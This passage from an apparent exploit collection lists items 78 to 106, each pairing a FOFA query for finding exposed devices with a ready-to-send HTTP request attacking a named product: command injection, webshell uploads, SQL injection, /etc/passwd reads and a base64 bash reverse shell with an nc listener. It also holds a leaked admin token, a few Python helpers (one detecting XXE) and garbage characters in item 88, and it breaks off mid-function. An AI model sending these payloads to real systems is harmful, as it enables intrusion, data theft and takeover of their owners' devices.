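    return build_upload_request(host, "/Platform/System/FileUpload.ashx", boundary, parts)


def verify_path(marker: str) -> str:
    """Where item 78 says the uploaded file becomes reachable."""
    return f"/Applications/SkillDevelopAndEHS/{marker}.txt"


def content_length(request: bytes) -> int:
    """Return the declared Content-Length, refusing requests whose body does not match it."""
    head, _, body = request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            declared = int(line.split(b":", 1)[1])
            if declared != len(body):
                raise ValueError(f"declared {declared} bytes, body has {len(body)}")
            return declared
    raise ValueError("no Content-Length header")


if __name__ == "__main__":
    marker = random_token(27)
    req = pkpmbs_request("x.x.x.x", marker)
    print(req.decode())
    print("verify with GET", verify_path(marker))
```

Built with the marker used on the page (YsOxWxSvj1KyZow1PTsh98fdu6l) the body comes out at exactly 336 bytes, the Content-Length item 78 lists, which is a quick way to confirm a rebuilt request before sending it.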

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

The path value is handed to a shell; the pipe runs id and its output comes back in the response.

80. Superdata (速达) 天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The report parameter names the saved file without normalisation, so ../ moves it out of the report directory into the web root. Verify:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

Command 255 is answered without a valid login handle, and the response contains the device's account credentials.

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

The z2 value is spliced into a shell command line; the quoted |id; breaks out of the intended argument.

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

The JSON body supplies the JDBC connection details that the report module tests; the Cmd header carries the command the payload executes, and its output is reflected in the response.

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

The sql field is rendered as a FreeMarker template before it is used, so the same Execute utility as in item 76 runs an arbitrary command; here the result is observed through a DNS callback.

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below drops a Godzilla (哥斯拉) webshell:
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

accountId is used unsanitised as a directory name, so the traversal writes the uploaded content under tomcat/webapps. The shell is then reachable at http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The host value is wrapped in newlines (%0a), so the shell that runs the ping treats cat /etc/passwd as a separate command; ${IFS} stands in for the space to survive input filtering.

87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix value is appended to the stored file name without normalisation, so /../../../jfhatuwe.php escapes the preview directory into the web root. Then request /jfhatuwe.php

2 f, I) \3 H. j- L# I; P88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 h# w/ x1 T3 X C( k- l' F% |FOFA:title="明御安全网关"
4 ] p" l3 Y }GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.17 {6 g4 B& N: N' |, x
Host: x.x.x.xx.x.x.x" c, ^: _- ?2 t, J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# j. c+ \/ x8 o/ `/ B% ~" W) ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; J' A& m& f+ X) g
Accept-Encoding: gzip, deflate& L+ [! \/ |& \$ ?, V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 `7 N6 o" o8 y$ j {. ?0 E: vConnection: close
, W0 a- n8 s% x! V
8 _1 z% d9 w7 m0 e" g0 H3 [1 b6 Z: Z2 b8 ~6 l& P( y
/astdfkhl.php& n0 o& Y/ V3 F9 x" i0 B$ [! v
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The .js%70 spelling of .jsp slips past the extension-based authentication filter; a vulnerable instance returns 24642 (111*222) in the response.

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

Decoded, the body is jsondata[type]=99&jsondata[ip]=ipconfig: with type 99 the ip value is executed as a command and its output is returned in the JSON response.

91. Hikvision integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The ..;/ segment passes the gateway's path-based authorization (it sees /center/api/task/) while the backend normalises it away and serves orgManage/v1/orgs/download, whose fileName parameter is not confined to the upload directory.

92. Hikvision operations management center (运行管理中心) session command execution
Fastjson deserialization command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

The Testcmd header carries the command that the Fastjson gadget in the JSON body executes.

93. QAX Legendsec (奇安信网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The import handler stores the uploaded file under the web-served attachements directory without checking the extension. Verify:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QAX Legendsec SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Same handler family as item 93, reached through the address-object importer. Verify with the file name uploaded above:

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% C8 o" ~5 R% w1 q9 G7 B8 }, \. `" p s6 L& ]' y
5 t% e1 h2 b: a* i- Q# e% S. v5 T6 S' ?
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial (a DNS-log callback is used here so success can be confirmed out of band):
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Put the generated base64 in place of the placeholder in the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz < 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell: start a listener on the attacker host (Kali) first:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

(URL-decoded, the body is {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the param value is passed to a shell.)

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

(The server fetches the RetrievalMethod URI itself; a DNS-log host there confirms the SSRF.)

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML below; the external parameter entity makes the server's XML parser fetch the attacker-controlled URL:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
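Added example (mine, not part of the original listing): a Python checker that base64-decodes a SAMLRequest value and flags the DTD constructs that this XXE relies on (DOCTYPE and ENTITY declarations, SYSTEM/PUBLIC identifiers, parameter-entity references). The positive sample is the SAMLRequest value from the PoC above; the benign AuthnRequest is constructed here for contrast. The DEFLATE step covers HTTP-Redirect-binding values, which the PoC does not use; that handling is my addition.

```python
import base64
import re
import zlib

# Positive sample: the SAMLRequest value from the PoC request above (page data).
POC_SAMLREQUEST = "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="

# Negative sample, constructed here: a plain AuthnRequest with no DTD.
BENIGN_XML = (b'<?xml version="1.0"?><samlp:AuthnRequest '
              b'xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0"/>')
BENIGN_SAMLREQUEST = base64.b64encode(BENIGN_XML).decode()

# Constructs that have no business in a SAML message; together they characterise an XXE attempt.
DTD_MARKERS = [
    (re.compile(rb"<!DOCTYPE", re.I), "DOCTYPE declaration"),
    (re.compile(rb"<!ENTITY", re.I), "ENTITY declaration"),
    (re.compile(rb"\b(SYSTEM|PUBLIC)\b"), "external identifier"),
    (re.compile(rb"%[A-Za-z_][\w.-]*;"), "parameter entity reference"),
]


def decode_samlrequest(value: str) -> bytes:
    """Base64-decode a SAMLRequest value; tolerate the URL-safe alphabet and missing padding,
    and inflate it if it was sent DEFLATE-compressed (HTTP-Redirect binding)."""
    v = value.strip().replace("-", "+").replace("_", "/")
    v += "=" * (-len(v) % 4)
    raw = base64.b64decode(v)
    if not raw.lstrip().startswith(b"<"):
        try:
            raw = zlib.decompress(raw, -15)  # raw DEFLATE stream, no zlib header
        except zlib.error:
            pass
    return raw


def find_dtd_indicators(xml: bytes) -> list:
    """Names of the DTD / external-entity constructs present in the XML, in marker order."""
    return [name for rx, name in DTD_MARKERS if rx.search(xml)]


def inspect_samlrequest(value: str) -> dict:
    """Decode one SAMLRequest value and report whether it carries a DTD (an XXE indicator)."""
    try:
        xml = decode_samlrequest(value)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return {"decodable": False, "suspicious": True, "indicators": ["not valid base64"], "xml": b""}
    indicators = find_dtd_indicators(xml)
    return {"decodable": True, "suspicious": bool(indicators), "indicators": indicators, "xml": xml}


if __name__ == "__main__":
    for label, value in (("poc", POC_SAMLREQUEST), ("benign", BENIGN_SAMLREQUEST)):
        result = inspect_samlrequest(value)
        print(label, "suspicious" if result["suspicious"] else "clean", result["indicators"])
```

Run it over the SAMLRequest parameter of logged POSTs to saml-sso.cgi: any value with a DOCTYPE is worth an alert on its own, since a legitimate SAML message never carries one.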

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
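Added example (mine, not from the page or the SpringBlade project): decode the Blade-Auth token above without verifying it, to see whose token it is and for how long it is valid. Verifying the HS512 signature would need the server's HMAC key, which this page does not give, so the helper deliberately stops at the claims. The 24-hour lifetime threshold in assess() is my choice.

```python
import base64
import json
from datetime import datetime, timezone

# Sample input: the Blade-Auth header value from the PoC above (page data).
POC_BLADE_AUTH = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9."
    "eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluI"
    "iwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ."
    "wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A"
)


def _b64url_decode(segment: str) -> bytes:
    """JWT segments are unpadded base64url; restore the padding before decoding."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def parse_jwt_unverified(token: str) -> dict:
    """Split a compact JWS into header, claims and raw signature WITHOUT checking the signature."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("expected 3 dot-separated segments, got %d" % len(parts))
    return {
        "header": json.loads(_b64url_decode(parts[0])),
        "claims": json.loads(_b64url_decode(parts[1])),
        "signature": _b64url_decode(parts[2]),
    }


def token_lifetime_seconds(claims: dict) -> int:
    """exp minus nbf (or iat when nbf is absent)."""
    start = claims.get("nbf", claims.get("iat"))
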